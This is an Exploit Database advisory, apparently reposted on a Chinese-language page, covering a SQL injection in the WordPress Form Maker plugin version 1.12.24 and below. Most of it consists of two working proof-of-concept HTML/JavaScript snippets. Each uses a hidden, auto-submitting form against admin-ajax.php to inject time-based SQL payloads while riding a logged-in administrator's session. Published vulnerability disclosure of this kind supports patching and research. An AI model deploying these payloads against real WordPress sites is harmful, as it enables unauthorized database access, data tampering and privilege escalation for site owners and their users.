WordPress Plugin Form Maker 1.12.24 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： defensecode
  日期： 2018-06-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44853/

• # Title: WordPress Form Maker Plugin 1.12.24 - SQL Injection
  # Date: 2018-06-07
  # Author: Neven Biruski
  # Software: WordPress Form Maker plugin
  # https://wordpress.org/plugins/form-maker/
  # Version: 1.12.24 and below
  # Vendor Status: Vendor contacted, update released
  
  # The easiest way to reproduce the SQL injection vulnerabilities is to
  # open the presented HTML/JavaScript snippet in your browser while being
  # logged in as administrator or another user that is authorized to
  # access the plugin settings page. Users that do not have full
  # administrative privileges could abuse the database access the
  # vulnerabilities provide to either escalate their privileges or obtain
  # and modify database contents they were not supposed to be able to.
  
  # PoC 1
  
  <iframe style="display:none" name="invisible"></iframe>
  <form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping&task=db_table_struct"
  target="invisible">
  <input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
  </form>
  <script>
   document.getElementById("form").submit();
   sleep(3000);
  </script>
  
  # PoC 2
  
  <iframe style="display:none" name="invisible"></iframe>
  <form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=6&send_header=0&action=generete_csv&limitstart=0"
  target="invisible">
  <input type="hidden" name="search_labels" value="2) AND (SELECT * FROM (SELECT(SLEEP(42)))XXX)-- XXX"/>
  </form>
  <script>
   document.getElementById("form").submit();
   sleep(3000);
  </script>